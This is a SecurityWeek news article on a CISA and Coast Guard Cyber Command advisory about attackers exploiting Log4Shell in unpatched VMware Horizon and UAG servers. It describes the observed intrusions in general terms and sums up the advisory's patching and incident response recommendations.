Connect with us

Hi, what are you looking for?


Malware & Threats

US Agencies Warn Organizations of Log4Shell Attacks Against VMware Products

The United States Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have issued a joint advisory to warn organizations that threat actors continue to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers.

The United States Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER) have issued a joint advisory to warn organizations that threat actors continue to exploit the Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers.

Tracked as CVE-2021-44228, the infamous Log4Shell vulnerability that was disclosed in November 2021 impacts the widely used Apache Log4j logging tool, and is described as a critical-severity flaw leading to remote code execution.

Exploitation of the vulnerability started less than two weeks after the bug was reported, prompting organizations to prioritize the deployment of available patches.

Since December 2021, numerous threat actors have been observed exploiting the vulnerability in VMware Horizon and UAG servers, including state-sponsored advanced persistent threat (APT) actors. VMware released fixes for this vulnerability in early December 2021.

Following successful exploitation, the adversaries deploy malicious loaders and eventually gain remote control of the compromised systems. In one attack, CISA and CGCYBER say, the threat actors managed to move laterally to a disaster recovery network and exfiltrated sensitive data.

The joint Cybersecurity Advisory (CSA) from CISA and CGCYBER provides details on the tactics, techniques, and procedures (TTPs) employed by threat actors in the observed attacks, along with incident response recommendations.

Attackers can exploit Log4Shell via specially crafted requests that will result in the execution of arbitrary code. Because of the bug, a broad range of consumer and enterprise applications, services, websites, and other products are exposed to potential attacks.

During one of the observed attacks, the threat actors deployed a remote access tool that could log keystrokes, deploy and run payloads, and provide access to the compromised system’s desktop. Functioning as a command and control (C&C) tunneling proxy, the malware also allowed the attackers to move laterally.

Advertisement. Scroll to continue reading.

While investigating the compromise of another victim, CISA discovered intrusions from multiple threat actors, some of which had access to the environment since late January 2022 or earlier. The attackers likely exploited Log4Shell in an unpatched VMware Horizon server for initial access.

Following initial access, the threat actors used PowerShell scripts to deploy additional payloads, and moved laterally using the Remote Desktop Protocol (RDP), compromising multiple systems, including the victim’s disaster recovery network, and deployed malware that provided them with monitoring capabilities, reverse shell access, payload delivery, and data exfiltration capabilities.

When identifying a potential breach, CISA and CGCYBER say, administrators should isolate the affected systems, collect and review logs and artifacts, engage with an incident response firm if necessary, and report the incident to CISA or the US Coast Guard (USCG) National Response Center (NRC).

To mitigate risks, organizations are advised to update their VMware Horizon and UAG systems so that they are patched against Log4Shell, and to treat unpatched systems as if they have been compromised. Keeping all software updated at all times, applying network segmentation, implementing multi-factor authentication and best practices for identity and access management (IAM) should also mitigate risks.

“Until the [VMware] update is fully implemented, consider removing vulnerable components from the internet to limit the scope of traffic. While installing the updates, ensure network perimeter access controls are as restrictive as possible,” the CSA reads.

Related: Spring4Shell: Spring Flaws Lead to Confusion, Concerns of New Log4Shell-Like Threat

Related: Log4Shell-Like Vulnerability Found in Popular H2 Database

Related: Serious Vulnerabilities Found in AWS’s Log4Shell Hot Patches

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Gain valuable insights from industry professionals who will help guide you through the intricacies of industrial cybersecurity.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...


A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...


Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.